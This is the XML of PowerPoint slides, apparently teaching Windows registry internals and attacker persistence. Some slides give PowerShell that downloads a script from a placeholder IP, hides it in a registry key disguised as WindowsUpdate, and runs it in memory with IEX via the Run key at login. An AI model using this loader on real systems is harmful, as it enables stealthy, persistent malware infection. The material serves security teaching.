                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ItemProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> we can put more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t> script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXEs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> into any registry key that we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>want.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Persistence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cyber one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30419471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2009" y="2675467"/>
            <a:ext cx="8964487" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The following case downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> script and then create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Key and put it in the (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Download script to be kept in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> key</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$dl = (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('http://IP/script.ps1')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Creates and sets the default value to our downloaded script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>New-Item -Path HKCU:\software\wow6432node\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Value $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dl</a:t>
            </a:r>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Store a Script in a Key</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42771537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2675467"/>
            <a:ext cx="8712967" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Once it’s in the registry we can easily pull the data back out of it to execute in memory with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ItemProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Get the stored payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$value = Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ItemProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Path HKCU:\software\wow6432node\Microsoft\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WindowsUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Name</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"(Default)"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Execute it</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IEX ($value."(Default)")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Retrieve a PowerShell Script from a Key and Execute it</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18856968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2675467"/>
            <a:ext cx="8496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We then can put this script right into the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> key and it will execute</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>when the user logs in, pulling our other malicious files, in the registry, and executing them in memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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59</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00283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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is a hierarchical database that contains data that is critical for the operation of Windows and the applications and services that run on Windows. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>data is structured in a tree format. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>node in the tree is called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>key can contain both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>subkeys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and data entries called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Structure of the </a:t>
            </a:r>
            <a:r>
